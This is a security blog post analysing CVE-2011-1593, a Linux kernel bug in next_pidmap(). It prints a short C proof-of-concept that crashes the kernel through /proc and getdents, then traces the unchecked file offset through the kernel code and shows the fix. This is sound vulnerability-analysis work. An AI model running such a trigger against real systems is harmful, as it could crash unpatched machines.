xorl %eax, %eax

CVE-2011-1593: Linux kernel proc next_pidmap() Invalid Memory Access

with one comment

This vulnerability was discovered and reported by Tavis Ormandy and Robert Swiecki using the ‘iknowthis‘ system call fuzzer. Below you can see the trigger PoC code.

// Found by Tavis Ormandy's (taviso@cmpxchg8b.com):
// http://code.google.com/p/iknowthis/
// Analyzed by Robert Swiecki <robert@swiecki.net>
#define _GNU_SOURCE 1
#define _LARGEFILE64_SOURCE
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(void)
{
  int fd = open("/proc", O_DIRECTORY | O_RDONLY);
  if (fd == -1) {
    perror("open");
    return -1;
  }
  struct linux_dirent {
    long           d_ino;
    off_t          d_off;
    unsigned short d_reclen;
    char           d_name[];
  };
  lseek64(fd, 4000000000ULL, SEEK_SET);
  struct linux_dirent b[100];
  syscall(__NR_getdents, fd, b, sizeof(b));
}

The code is very straightforward. After opening ‘/proc’ directory and repositioning the offset to 4000000000 using lseek64() system call, it invokes getdents() in order to retrieve 100 directory entries and store them in the previously allocated ‘b[]’ structure.

The bug is triggered in next_pidmap() but this happens due to a missing check inside proc_pid_readdir() that can be found at fs/proc/base.c. More specifically have a look at the below code snippet of the latter routine.

/* for the /proc/ directory itself, after non-process stuff has been done */
int proc_pid_readdir(struct file * filp, void * dirent, filldir_t filldir)
{
        unsigned int nr = filp->f_pos - FIRST_PROCESS_ENTRY;
        struct task_struct *reaper = get_proc_task(filp->f_path.dentry->d_inode);
        struct tgid_iter iter;
        struct pid_namespace *ns;
    ...
        for (; nr < ARRAY_SIZE(proc_base_stuff); filp->f_pos++, nr++) {
                const struct pid_entry *p = &proc_base_stuff[nr];
    ...
        iter.tgid = filp->f_pos - TGID_OFFSET;
        for (iter = next_tgid(ns, iter);
             iter.task;
             iter.tgid += 1, iter = next_tgid(ns, iter)) {
                filp->f_pos = iter.tgid + TGID_OFFSET;
                if (proc_pid_fill_cache(filp, dirent, filldir, iter) < 0) {
                        put_task_struct(iter.task);
                        goto out;
                }
        }
        filp->f_pos = PID_MAX_LIMIT + TGID_OFFSET;
out:
        put_task_struct(reaper);
out_no_task:
        return 0;
}

As you can see, there is no check that the passed file position is valid before proceeding to further processing. The huge value that was passed as the ‘filp->f_pos’ is passed to next_tgid() via the ‘iter’ parameter. This function that also resides in the same source code file will lead to the following code path.

static struct tgid_iter next_tgid(struct pid_namespace *ns, struct tgid_iter iter)
{
        struct pid *pid;
    ...
retry:
        iter.task = NULL;
        pid = find_ge_pid(iter.tgid, ns);
    ...
        rcu_read_unlock();
        return iter;
}

Passing the huge value to find_ge_pid() which is a C routine from kernel/pid.c file that you can see here.

/*
 * Used by proc to find the first pid that is greater than or equal to nr.
 *
 * If there is a pid at nr this function is exactly the same as find_pid_ns.
 */
struct pid *find_ge_pid(int nr, struct pid_namespace *ns)
{
        struct pid *pid;

        do {
                pid = find_pid_ns(nr, ns);
                if (pid)
                        break;
                nr = next_pidmap(ns, nr);
        } while (nr > 0);

        return pid;
}

This reaches next_pidmap() that does not perform any checks in its second argument (integer ‘last’) and handles it as a signed integer.

int next_pidmap(struct pid_namespace *pid_ns, int last)
{
        int offset;
        struct pidmap *map, *end;

        offset = (last + 1) & BITS_PER_PAGE_MASK;
        map = &pid_ns->pidmap[(last + 1)/BITS_PER_PAGE];
        end = &pid_ns->pidmap[PIDMAP_ENTRIES];
        for (; map < end; map++, offset = 0) {
                if (unlikely(!map->page))
                        continue;
                offset = find_next_bit((map)->page, BITS_PER_PAGE, offset);
                if (offset < BITS_PER_PAGE)
                        return mk_pid(pid_ns, map, offset);
        }
        return -1;
}

Due to the completely unchecked ‘f_pos’ value, the above function will attempt to access invalid memory due to the usage of incorrect ‘last’ integer as part of the array index value.

To fix this bug Linus Torvalds committed a patch in proc_pid_readdir() that checks the offset to avoid any truncated values. Here is this patch.

 int proc_pid_readdir(struct file * filp, void * dirent, filldir_t filldir)
 {
-	unsigned int nr = filp->f_pos - FIRST_PROCESS_ENTRY;
-	struct task_struct *reaper = get_proc_task(filp->f_path.dentry->d_inode);
+	unsigned int nr;
+	struct task_struct *reaper;
 	struct tgid_iter iter;
 	struct pid_namespace *ns;
 
+	if (filp->f_pos >= PID_MAX_LIMIT + TGID_OFFSET)
+		goto out_no_task;
+	nr = filp->f_pos - FIRST_PROCESS_ENTRY;
+
+	reaper = get_proc_task(filp->f_path.dentry->d_inode);
 	if (!reaper)
 		goto out_no_task;

As you can see, now ‘filp->f_pos’ is checked against PID_MAX_LIMIT defined in include/linux/threads.h header file

/*
 * This controls the default maximum pid allocated to a process
 */
#define PID_MAX_DEFAULT (CONFIG_BASE_SMALL ? 0x1000 : 0x8000)

/*
 * A maximum of 4 million PIDs should be enough for a while.
 * [NOTE: PID/TIDs are limited to 2^29 ~= 500+ million, see futex.h.]
 */
#define PID_MAX_LIMIT (CONFIG_BASE_SMALL ? PAGE_SIZE * 8 : \
        (sizeof(long) > 4 ? 4 * 1024 * 1024 : PID_MAX_DEFAULT))

And TGID_OFFSET of fs/proc/base.c

#define TGID_OFFSET (FIRST_PROCESS_ENTRY + ARRAY_SIZE(proc_base_stuff))

In order to avoid any truncated offset values. The repositioned get_proc_task() call is used to identify inodes owned by 0 PID (which is the scheduler) and immediately jump to ‘out_no_task’ label.
In addition to this, kernel/pid.c was updated to explicitly check against the PID_MAX_LIMIT and fix the signedness issue like this:

-int next_pidmap(struct pid_namespace *pid_ns, int last)
+int next_pidmap(struct pid_namespace *pid_ns, unsigned int last)
 {
 	int offset;
 	struct pidmap *map, *end;
 
+	if (last >= PID_MAX_LIMIT)
+		return -1;
+
 	offset = (last + 1) & BITS_PER_PAGE_MASK;

Written by xorl

April 25, 2011 at 18:02

Posted in bugs, linux

One Response

Subscribe to comments with RSS.

  1. Just for clarification, Robert used Taviso fuzzer “iknowthis” to find the bug and analyzed it by himself. Taviso didn’t reported it nor discovered. The intro may be a little bit misleading;-)

    s1m0n

    April 26, 2011 at 11:25


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s